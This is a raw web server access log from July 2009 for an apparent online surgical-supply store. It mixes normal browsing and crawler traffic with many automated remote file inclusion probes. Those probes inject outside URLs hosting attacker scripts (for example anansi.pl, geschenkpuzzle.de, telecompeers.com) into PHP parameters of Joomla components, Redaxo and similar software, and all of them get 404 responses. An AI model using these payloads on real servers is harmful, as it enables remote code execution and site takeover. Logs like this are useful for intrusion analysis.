214.1.3.248 - - [15/Jul/2009:07:57:55 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L015B884935247200E201071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.3.248 - - [15/Jul/2009:07:57:55 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L015B884935247200E201071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
94.23.2.21 - - [15/Jul/2009:07:57:58 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
94.23.2.21 - - [15/Jul/2009:07:57:58 -0400] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
94.23.2.21 - - [15/Jul/2009:07:57:58 -0400] "GET /logs/access_log.Q109052600//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:07:57:58 -0400] "GET /index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:07:57:59 -0400] "GET /logs/access_log.Q109070200%20%20/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:07:57:59 -0400] "GET /logs/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
94.23.2.21 - - [15/Jul/2009:07:57:59 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
94.23.2.21 - - [15/Jul/2009:07:57:59 -0400] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
94.23.2.21 - - [15/Jul/2009:07:57:59 -0400] "GET /logs/access_log.Q109052600//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
94.23.2.21 - - [15/Jul/2009:07:58:04 -0400] "GET /logs/access_log.Q109053100//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
172.16.1.180 - - [15/Jul/2009:07:58:04 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [15/Jul/2009:07:58:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [15/Jul/2009:07:58:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
94.23.2.21 - - [15/Jul/2009:07:58:04 -0400] "GET /logs/access_log.Q109053100//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
141.223.5.12 - - [15/Jul/2009:07:58:04 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
141.223.5.12 - - [15/Jul/2009:07:58:05 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
141.223.5.12 - - [15/Jul/2009:07:58:06 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
141.223.5.12 - - [15/Jul/2009:07:58:21 -0400] "GET /logs/error_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://telecompeers.com/cms/media/ramaid.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
220.231.126.252 - - [15/Jul/2009:07:58:27 -0400] "GET /logs/access_log.Q109050900//com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:07:58:33 -0400] "GET /logs/errors.php?error=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:07:58:33 -0400] "GET /errors.php?error=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
114.200.199.144 - - [15/Jul/2009:07:58:33 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.161.230 - - [15/Jul/2009:07:58:34 -0400] "GET /logs/error_log.Q109062800 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.200.199.144 - - [15/Jul/2009:07:58:41 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:07:58:48 -0400] "GET //components/com_sef/sef.php?mosConfig_admin_path=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:07:58:48 -0400] "GET /logs/access_log.Q109052900//components/com_sef/sef.php?mosConfig_admin_path=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:07:58:48 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_admin_path=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:07:59:10 -0400] "GET //components/com_sef/sef.php?mosConfig_admin_path=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:07:59:10 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_sef/sef.php?mosConfig_admin_path=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:07:59:10 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_admin_path=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:07:59:15 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.23.2.21 - - [15/Jul/2009:07:59:48 -0400] "GET /logs/access_log.Q109052600%20%20//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
94.23.2.21 - - [15/Jul/2009:07:59:48 -0400] "GET /logs/access_log.Q109053100%20%20//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
172.16.1.180 - - [15/Jul/2009:07:59:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [15/Jul/2009:07:59:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [15/Jul/2009:07:59:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.18.63.194 - - [15/Jul/2009:08:00:17 -0400] "GET /logs/access_log.Q109070200/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.18.63.194 - - [15/Jul/2009:08:00:23 -0400] "GET /logs/access_log.Q109060900/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
94.23.2.21 - - [15/Jul/2009:08:00:36 -0400] "GET /logs/access_log.Q109052600%20%20//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
94.23.2.21 - - [15/Jul/2009:08:00:36 -0400] "GET /logs/access_log.Q109053100%20%20//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
172.16.1.180 - - [15/Jul/2009:08:00:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [15/Jul/2009:08:00:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [15/Jul/2009:08:00:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
76.12.17.218 - - [15/Jul/2009:08:01:06 -0400] "GET /logs/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:01:06 -0400] "GET /logs/access_log.Q109070200/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:01:06 -0400] "GET /index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:08:01:13 -0400] "GET /logs/access_log.Q109060800%20%20//components/com_sef/sef.php?mosConfig_admin_path=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:01:26 -0400] "GET /logs/access_log.Q109070200/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:01:26 -0400] "GET /logs/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:01:26 -0400] "GET /index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:01:44 -0400] "GET /logs/access_log.Q109070200%20%20/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:02:02 -0400] "GET /logs/access_log.Q109070200%20%20/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:02:03 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:08:02:08 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_admin_path=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:08:02:08 -0400] "GET //components/com_sef/sef.php?mosConfig_admin_path=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:08:02:08 -0400] "GET /logs/access_log.Q109052900//components/com_sef/sef.php?mosConfig_admin_path=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
172.16.1.180 - - [15/Jul/2009:08:02:09 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [15/Jul/2009:08:02:09 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [15/Jul/2009:08:02:09 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
76.12.17.218 - - [15/Jul/2009:08:02:12 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.76.244.162 - - [15/Jul/2009:08:02:34 -0400] "GET /popup.php?path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
94.76.244.162 - - [15/Jul/2009:08:02:34 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.76.244.162 - - [15/Jul/2009:08:02:35 -0400] "GET /logs/popup.php?path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:02:35 -0400] "GET /index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:02:35 -0400] "GET /logs/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:02:35 -0400] "GET /logs/access_log.Q109070200/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.18.63.194 - - [15/Jul/2009:08:02:44 -0400] "GET /index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.18.63.194 - - [15/Jul/2009:08:02:44 -0400] "GET /logs/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.18.63.194 - - [15/Jul/2009:08:02:44 -0400] "GET /logs/access_log.Q109070200/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
94.76.244.162 - - [15/Jul/2009:08:02:58 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://www.afrimidurimi.de/sobi/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:08:03:08 -0400] "GET /logs/access_log.Q109070200%20%20/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:08:03:18 -0400] "GET /logs/access_log.Q109060800//components/com_sef/sef.php?mosConfig_admin_path=http://www.usher.co.kr//bbs/data/.rgboard/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.249.68.70 - - [15/Jul/2009:08:03:19 -0400] "GET /images/items/index2_ssblades.jpg HTTP/1.1" 200 2476 "-" "Googlebot-Image/1.0"
76.12.17.218 - - [15/Jul/2009:08:03:25 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.18.63.194 - - [15/Jul/2009:08:03:45 -0400] "GET /logs/access_log.Q109070200%20%20/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.180 - - [15/Jul/2009:08:03:49 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [15/Jul/2009:08:03:49 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [15/Jul/2009:08:03:49 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.18.63.194 - - [15/Jul/2009:08:03:52 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:08:04:49 -0400] "GET /logs/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:08:04:49 -0400] "GET /index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:08:04:52 -0400] "GET /logs/access_log.Q109070200/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.15.177.55 - - [15/Jul/2009:08:04:58 -0400] "GET /playing.php/common/db.php?commonpath=http://123.143.98.5/saengcho//bbs/data/up/chid.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.65"
67.15.177.55 - - [15/Jul/2009:08:04:58 -0400] "GET /logs/access_log.Q109062600/playing.php/common/db.php?commonpath=http://123.143.98.5/saengcho//bbs/data/up/chid.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
67.15.177.55 - - [15/Jul/2009:08:04:58 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://123.143.98.5/saengcho//bbs/data/up/chid.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
67.15.177.55 - - [15/Jul/2009:08:05:00 -0400] "GET /logs/access_log.Q109060100/playing.php/common/db.php?commonpath=http://123.143.98.5/saengcho//bbs/data/up/chid.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
66.249.68.247 - - [15/Jul/2009:08:05:18 -0400] "GET /images/download_tut_PRP.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
114.200.199.144 - - [15/Jul/2009:08:05:37 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://wiach.magicwap.net/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:08:05:39 -0400] "GET /logs/access_log.Q109070200/index.php?redir=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.246.136.122 - - [15/Jul/2009:08:05:41 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01 HTTP/1.1" 200 49495 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:42 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.246.136.122 - - [15/Jul/2009:08:05:43 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Window